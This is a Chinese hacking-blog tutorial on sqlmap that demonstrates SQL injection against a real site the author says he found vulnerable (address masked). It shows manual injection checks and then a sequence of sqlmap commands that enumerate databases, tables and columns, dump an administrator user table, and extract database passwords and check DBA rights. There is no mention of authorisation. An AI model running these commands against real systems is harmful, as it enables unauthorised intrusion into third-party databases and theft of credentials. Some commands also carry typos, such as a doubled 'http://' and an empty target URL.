危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2304 浏览17777276

全方位解剖sqlmap常用命令

sqlmap,一款强大的注入工具,介绍、安装什么的,我就不多说了。




先看看使用帮助







这里拿我先前找到的一个存在SQL注入漏洞的网站进行演示(敏感数据已打码)




目标URL:http://www.xxx.com/xx.xxx?id=5




手工检测SQL注入点,我们只需简单的两三条语句便可以检测其是否存在SQL注入




1. 在目标URL后加一个单引号,发现有SQL报错回显;




http://http://www.xxx.com/xx.xxx?id=5'






2. 分别在目标URL后面加上 and 1=1 和 and 1=2 进行访问,会发现显示页面不一样,也就说明有问题




3. 也可以直接使用burpsuite等抓包工具对有参数提交的地方抓取其数据包,直接放sqlmap里面跑。




好了,既然发现SQL注入的问题存在了,开始进行注入




sqlmap.py -u http://www.xxx.com/xx.xxx?id=5




//使用sqlmap工具进行扫描,下面扫出了几个 Payload








sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"–dbs




//获取数据库







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-db




//获取当前数据库名







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--current-user




//获取当前数据库的用户名







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--tables




//获取数据库的表名







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--tables -D r3550c17g3




//获取指定数据库中的表名







sqlmap.py -u "" --columns -Tmanage_user -D r3550c17g3




//获取指定表中的列名







sqlmap.py -u "http://www.xxx.com/xx.xxx?id=5"--dump -C manage_name -T manage_user -D r3550c17g3




//获取指定列名中的字段








总  结




常用语句:




sqlmap.py -u "[URL]"   或  sqlmap.py -r "[数据包_path]"




sqlmap.py -u "[URL]" –dbs    //获取数据库




sqlmap.py -u "[URL]" --current-db    //获取当前数据库名




sqlmap.py -u "[URL]" --current-user    //获取当前数据库的用户名




sqlmap.py -u "[URL]" --tables    //获取数据的所有表名




sqlmap.py -u "[URL]" --tables -D [数据库名]    //获取指定数据库中的所有表名




sqlmap.py -u "[URL]" --column -T [表名] -D [数据库名]    //获取指定表中的列字段




sqlmap.py -u "[URL]" --dump -C [列名] -T [表名] -D [数据库名]  //爆指定列中的字段




sqlmap.py -u "[URL]" --privileges     //查看当前数据库的用户权限




sqlmap.py -u "[URL]" --password    //爆数据库的密码




sqlmap.py -u "[URL]" --is-dba -v 1    //看有没有数据库管理员权限